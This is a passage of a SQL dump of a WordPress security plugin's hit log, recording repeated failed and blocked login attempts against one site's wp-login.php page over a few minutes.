Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6416,0.000000,1629466865.959283,'\0\0\0\0\0\0\0\0\0\0��|ym�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6417,0.000000,1629466885.195635,'\0\0\0\0\0\0\0\0\0\0���a',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6418,0.000000,1629466888.012820,'\0\0\0\0\0\0\0\0\0\0���a',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6419,0.000000,1629466903.734014,'\0\0\0\0\0\0\0\0\0\0����|',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6420,0.000000,1629466916.183936,'\0\0\0\0\0\0\0\0\0\0��Q�2',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6421,0.000000,1629466926.054172,'\0\0\0\0\0\0\0\0\0\0���	�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6422,0.000000,1629466938.371196,'\0\0\0\0\0\0\0\0\0\0��ɔ�5',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6423,0.000000,1629466950.962716,'\0\0\0\0\0\0\0\0\0\0��:*V',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6424,0.000000,1629466957.012168,'\0\0\0\0\0\0\0\0\0\0��:*V',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6425,0.000000,1629466959.717821,'\0\0\0\0\0\0\0\0\0\0��:*V',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6426,0.000000,1629466988.283116,'\0\0\0\0\0\0\0\0\0\0��|yVK',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6427,0.000000,1629466991.264705,'\0\0\0\0\0\0\0\0\0\0��|yVK',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6428,0.000000,1629466993.760552,'\0\0\0\0\0\0\0\0\0\0��|yVK',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6429,0.000000,1629467006.480857,'\0\0\0\0\0\0\0\0\0\0��=Zm�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6430,0.000000,1629467009.344188,'\0\0\0\0\0\0\0\0\0\0��=Zm�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6431,0.000000,1629467011.477880,'\0\0\0\0\0\0\0\0\0\0��=Zm�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6432,0.000000,1629467034.190172,'\0\0\0\0\0\0\0\0\0\0���as?',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6433,0.000000,1629467038.801980,'\0\0\0\0\0\0\0\0\0\0���as?',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6434,0.000000,1629467041.624910,'\0\0\0\0\0\0\0\0\0\0���as?',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6435,0.000000,1629467056.758608,'\0\0\0\0\0\0\0\0\0\0���}/8',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6436,0.000000,1629467071.514341,'\0\0\0\0\0\0\0\0\0\0���gh.',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6437,0.000000,1629467077.451260,'\0\0\0\0\0\0\0\0\0\0���gh.',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6438,0.000000,1629467080.686412,'\0\0\0\0\0\0\0\0\0\0���gh.',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6439,0.000000,1629467094.617077,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6440,0.000000,1629467097.869014,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6441,0.000000,1629467110.869826,'\0\0\0\0\0\0\0\0\0\0��=Z�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6442,0.000000,1629467113.254274,'\0\0\0\0\0\0\0\0\0\0��=Z�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6443,0.000000,1629467162.905723,'\0\0\0\0\0\0\0\0\0\0��wL��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6444,0.000000,1629467172.106976,'\0\0\0\0\0\0\0\0\0\0���\" !',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6445,0.000000,1629467179.861995,'\0\0\0\0\0\0\0\0\0\0���\" !',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6446,0.000000,1629467183.237737,'\0\0\0\0\0\0\0\0\0\0���\" !',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6447,0.000000,1629467196.207733,'\0\0\0\0\0\0\0\0\0\0��\r�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6448,0.000000,1629467198.660539,'\0\0\0\0\0\0\0\0\0\0��\r�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6449,0.000000,1629467202.268502,'\0\0\0\0\0\0\0\0\0\0��\r�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6450,0.000000,1629467218.311837,'\0\0\0\0\0\0\0\0\0\0��|yT7',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6451,0.000000,1629467221.197459,'\0\0\0\0\0\0\0\0\0\0��|yT7',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6452,0.000000,1629467225.817188,'\0\0\0\0\0\0\0\0\0\0��|yT7',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6453,0.000000,1629467250.738174,'\0\0\0\0\0\0\0\0\0\0��wL.�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6454,0.000000,1629467256.005430,'\0\0\0\0\0\0\0\0\0\0��wL.�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6455,0.000000,1629467258.250104,'\0\0\0\0\0\0\0\0\0\0��wL.�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6456,0.000000,1629467275.209602,'\0\0\0\0\0\0\0\0\0\0����*�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6457,0.000000,1629467277.770050,'\0\0\0\0\0\0\0\0\0\0����*�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6458,0.000000,1629467280.355769,'\0\0\0\0\0\0\0\0\0\0����*�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6459,0.000000,1629467292.483673,'\0\0\0\0\0\0\0\0\0\0���	',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6460,0.000000,1629467294.851918,'\0\0\0\0\0\0\0\0\0\0���	',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6461,0.000000,1629467297.388835,'\0\0\0\0\0\0\0\0\0\0���	',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6462,0.000000,1629467347.694746,'\0\0\0\0\0\0\0\0\0\0��l:�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6463,0.000000,1629467359.008944,'\0\0\0\0\0\0\0\0\0\0���}.�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6464,0.000000,1629467362.302478,'\0\0\0\0\0\0\0\0\0\0���}.�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6465,0.000000,1629467377.997149,'\0\0\0\0\0\0\0\0\0\0����|h',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6466,0.000000,1629467380.884989,'\0\0\0\0\0\0\0\0\0\0����|h',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6467,0.000000,1629467384.368966,'\0\0\0\0\0\0\0\0\0\0����|h',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6468,0.000000,1629467393.698939,'\0\0\0\0\0\0\0\0\0\0��N�H',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6469,0.000000,1629467427.644965,'\0\0\0\0\0\0\0\0\0\0��n� ',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6470,0.000000,1629467430.979570,'\0\0\0\0\0\0\0\0\0\0��n� ',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6471,0.000000,1629467434.454732,'\0\0\0\0\0\0\0\0\0\0��n� ',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6472,0.000000,1629467448.262614,'\0\0\0\0\0\0\0\0\0\0��|yU�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6473,0.000000,1629467473.181766,'\0\0\0\0\0\0\0\0\0\0���y�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6474,0.000000,1629467492.535659,'\0\0\0\0\0\0\0\0\0\0��_k�D',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6475,0.000000,1629467495.532298,'\0\0\0\0\0\0\0\0\0\0��_k�D',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6476,0.000000,1629467514.289295,'\0\0\0\0\0\0\0\0\0\0���U\Z\"',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6477,0.000000,1629467526.350137,'\0\0\0\0\0\0\0\0\0\0���d�B',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6478,0.000000,1629467529.694327,'\0\0\0\0\0\0\0\0\0\0���d�B',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6479,0.000000,1629467542.507007,'\0\0\0\0\0\0\0\0\0\0���\"^',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6480,0.000000,1629467559.987269,'\0\0\0\0\0\0\0\0\0\0���e��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6481,0.000000,1629467562.818564,'\0\0\0\0\0\0\0\0\0\0���e��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6482,0.000000,1629467565.028356,'\0\0\0\0\0\0\0\0\0\0���e��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6483,0.000000,1629467578.506650,'\0\0\0\0\0\0\0\0\0\0��r\"�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6484,0.000000,1629467583.006906,'\0\0\0\0\0\0\0\0\0\0��r\"�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6485,0.000000,1629467595.155618,'\0\0\0\0\0\0\0\0\0\0���PǗ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6486,0.000000,1629467606.397127,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6487,0.000000,1629467610.736963,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6488,0.000000,1629467613.524641,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6489,0.000000,1629467628.267661,'\0\0\0\0\0\0\0\0\0\0���dz�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6490,0.000000,1629467640.702455,'\0\0\0\0\0\0\0\0\0\0���o�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6491,0.000000,1629467646.697117,'\0\0\0\0\0\0\0\0\0\0���o�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6492,0.000000,1629467649.005206,'\0\0\0\0\0\0\0\0\0\0���o�',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6493,0.000000,1629467673.641423,'\0\0\0\0\0\0\0\0\0\0���1Qq',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6494,0.000000,1629467723.420649,'\0\0\0\0\0\0\0\0\0\0��X�1t',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6495,0.000000,1629467728.911558,'\0\0\0\0\0\0\0\0\0\0��X�1t',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6496,0.000000,1629467743.600025,'\0\0\0\0\0\0\0\0\0\0���e��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6497,0.000000,1629467746.555798,'\0\0\0\0\0\0\0\0\0\0���e��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6498,0.000000,1629467758.988421,'\0\0\0\0\0\0\0\0\0\0����j',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6499,0.000000,1629467761.391057,'\0\0\0\0\0\0\0\0\0\0����j',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6500,0.000000,1629467764.859727,'\0\0\0\0\0\0\0\0\0\0����j',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6501,0.000000,1629467779.419481,'\0\0\0\0\0\0\0\0\0\0��|y��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6502,0.000000,1629467781.553014,'\0\0\0\0\0\0\0\0\0\0��|y��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6503,0.000000,1629467783.905920,'\0\0\0\0\0\0\0\0\0\0��|y��',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6504,0.000000,1629467798.314730,'\0\0\0\0\0\0\0\0\0\0��|y5',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6505,0.000000,1629467809.358477,'\0\0\0\0\0\0\0\0\0\0��|y��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6506,0.000000,1629467828.268185,'\0\0\0\0\0\0\0\0\0\0��|y�K',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0','loginFailInvalidUsername',NULL,NULL),(6507,0.000000,1629467851.793625,'\0\0\0\0\0\0\0\0\0\0��:��>',0,200,0,0,0,'https://equalitywalk.org.uk/wp-login.php','http://equalitywalk.org.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 